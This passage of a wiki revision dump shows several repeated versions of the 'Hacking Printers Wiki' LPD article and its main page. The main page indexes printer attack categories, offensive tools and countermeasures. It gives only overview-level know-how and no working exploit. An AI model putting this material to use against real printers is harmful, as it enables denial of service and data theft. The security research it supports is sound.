file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below: lpdprint.py hostname filename → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] ---- 65d50f0380917204602c1afbc7ed796b69e1f5e4 262 256 2017-01-28T14:47:36Z Admin 1 wikitext text/x-wiki [[File:LPD-deployment-channel.png|thumb|180px|Printing over LPD]] The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below: lpdprint.py hostname filename → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] ---- 4ae6ba157cc52b4877ecb23073ddc608dc04dcd5 256 246 2017-01-28T14:42:48Z Admin 1 wikitext text/x-wiki [[File:LPD-deployment-channel.png|thumb|180px|LPD print job deployment]] The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below: lpdprint.py hostname filename → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] ---- 28b06b78b2c3f55155922d4f5fc587992879e205 246 232 2017-01-28T14:16:17Z Admin 1 wikitext text/x-wiki [[File:LPD-deployment-channel.png|thumb|Deployment of (malicious) print jobs via LPD]] The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below: lpdprint.py hostname filename → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] ---- bccec674f65e4aba36a9e7660407d26a30d30884 232 82 2017-01-26T19:24:54Z Admin 1 wikitext text/x-wiki The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below: lpdprint.py hostname filename → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] ---- e64d7bf2c8576cf4452e2ee7e8e82760a54a850b 82 79 2017-01-09T09:49:57Z Admin 1 wikitext text/x-wiki The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] ---- db8790872fb8a14c9c21ea67cfde4cfa248051c7 79 77 2017-01-09T09:34:55Z Admin 1 wikitext text/x-wiki The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. → ''Related aricles:'' [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] ---- 006173043b68b42941accc934b2d916bda589f26 77 2017-01-09T09:12:47Z Admin 1 Created page with "The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https:/..." wikitext text/x-wiki The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. → ''Related aricles:'' [[Accounting bypass]], [[Buffer overflows]] ---- 96e303c92befb1e45f684905c142dd29a0cbc158 0 1 648 645 2017-10-13T09:06:06Z Admin 1 Undo revision 645 by [[Special:Contributions/85.98.95.146|85.98.95.146]] ([[User talk:85.98.95.146|talk]]) wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Comming soon: ''Hacking PostScript processing websites''</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ d79b6a1fd4889be34850f7bb2c070683a9802a7f 645 217 2017-09-17T20:08:23Z 85.98.95.146 0 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.6em 0.6em 0.6em 0.6em; background-color:#faf0ff; align:right; border:2px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki by RAMADAN ŞANLI''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT ( RAMADAN ŞANLI) --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS ( RAMADAN ŞANLI) --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF ( RAMADAN ŞANLI) --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Comming soon: ''Hacking PostScript processing websites''</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ 82349dc403f5d20980dc2be4516fcd331fed5e51 217 216 2017-01-23T18:22:23Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PJL]], [[PCL]], [[PostScript]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 9100 printing]] * [[Cross-site printing]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Countermeasures</h2> |- | * [[Countermeasures#Vendors|Vendors]], [[Countermeasures#Admins|Admins]], [[Countermeasures#Users|Users]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Bibliography</h2> |- | * [[Bibliography|Literature on printer security]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">References</h2> |- | * [[References|Printer language references]] |} |} <table id="mp-middle" style="width:100%; margin:4px 0 0 0; background:none; border-spacing: 0px;"> <tr> <td class="MainPageBG" style="width:100%; border:1px solid #f2cedd; background:#fff5fa; vertical-align:top; color:#000;"> <table id="mp-center" style="width:100%; vertical-align:top; background:#fff5fa; color:#000;"> <tr> <td style="padding:2px;"><h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2></td> </tr><tr> <td style="color:#000;"><div id="mp-tfl" style="padding:5px 8px;">Comming soon: ''Hacking PostScript processing websites''</div></td> </tr> </table> </td> </tr> <!-- <div style="margin-top:0.5em; padding:0.3em 0.3em 0.3em 0.3em; background-color:#fff5fa; align:right; border:1px solid #ddccff;"> <h2 id="mp-tfl-h2" style="margin:3px; background:#f2cedd; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #bfa3af; text-align:left; color:#000; padding:0.2em 0.4em">Beyond Printers</h2> <div id="mp-tfl" style="padding:6px 6px;"> Hacking PostScript Processors / websites </div> </div> --------------- Consult the [//meta.wikimedia.org/wiki/Help:Contents User's Guide] for information on using the wiki software. == Getting started == * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:Configuration_settings Configuration settings list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Manual:FAQ MediaWiki FAQ] * [https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce MediaWiki release mailing list] * [//www.mediawiki.org/wiki/Special:MyLanguage/Localisation#Translation_resources Localise MediaWiki for your language] --> __NOTOC__ d79b6a1fd4889be34850f7bb2c070683a9802a7f 216 165 2017-01-23T18:19:34Z Admin 1 wikitext text/x-wiki <div style="margin-top:0.5em; padding:0.5em 0.5em 0.5em 0.5em; background-color:#faf0ff; align:right; border:1px solid #ddccff;"> <div id="mp-tfl" style="padding:0px 6px;"> This is the '''Hacking Printers Wiki''', an open approach to share knowledge on printer (in)security. </div> </div> <!-- TODAY'S FEATURED CONTENT --> {| id="mp-upper" style="width: 100%; margin:4px 0 0 0; background:none; border-spacing: 0px;" <!-- ATTACKS --> | class="MainPageBG" style="width:55%; border:1px solid #cef2e0; background:#f5fffa; vertical-align:top; color:#000;" | {| id="mp-left" style="width:100%; vertical-align:top; background:#f5fffa;" | style="padding:2px;" | <h2 id="mp-tfa-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">Attacks</h2> |- | * '''[[Denial of service]]''': ** [[Transmission channel]] ** [[Document processing]] ** [[Physical damage]] * '''[[Privilege escalation]]''': ** [[Factory defaults]] ** [[Accounting bypass]] ** [[Fax and Scanner]] * '''[[Print job access]]''': ** [[Print job retention]] ** [[Print job manipulation]] * '''[[Information disclosure]]''': ** [[Memory access]] ** [[File system access]] ** [[Credential disclosure]] * '''[[Code execution]]''': ** [[Buffer overflows]] ** [[Firmware updates]] ** [[Software packages]] |- | style="padding:2px;" | <h2 id="mp-dyk-h2" style="margin:3px; background:#cef2e0; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3bfb1; text-align:left; color:#000; padding:0.2em 0.4em;">TL;DR</h2> |- | <div style="padding:0px 8px;"> Check out the [[Printer Security Testing Cheat Sheet]] </div> |} | style="border:1px solid transparent;" | <!-- OTHER STUFF --> | class="MainPageBG" style="width:45%; border:1px solid #cedff2; background:#f5faff; vertical-align:top;"| {| id="mp-right" style="width:100%; vertical-align:top; background:#f5faff;" | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Tools</h2> |- | * [[PRET]], [[Praeda]], [[PFT]], [[BeEF]] |- | style="padding:2px;" | <h2 id="mp-itn-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Fundamentials</h2> |- | * '''[[Fundamentals#Printer Control Languages|Printer languages]] ** [[PostScript]], [[PJL]], [[PCL]] * '''[[Fundamentals#Network printing protocols|Network protocols]] ** [[LPD]], [[IPP]], [[Raw]], [[SMB]] |- | style="padding:2px;" | <h2 id="mp-otd-h2" style="margin:3px; background:#cedff2; font-family:inherit; font-size:120%; font-weight:bold; border:1px solid #a3b0bf; text-align:left; color:#000; padding:0.2em 0.4em;">Attack Carriers</h2> |- | * [[USB drive or cable]] * [[Port 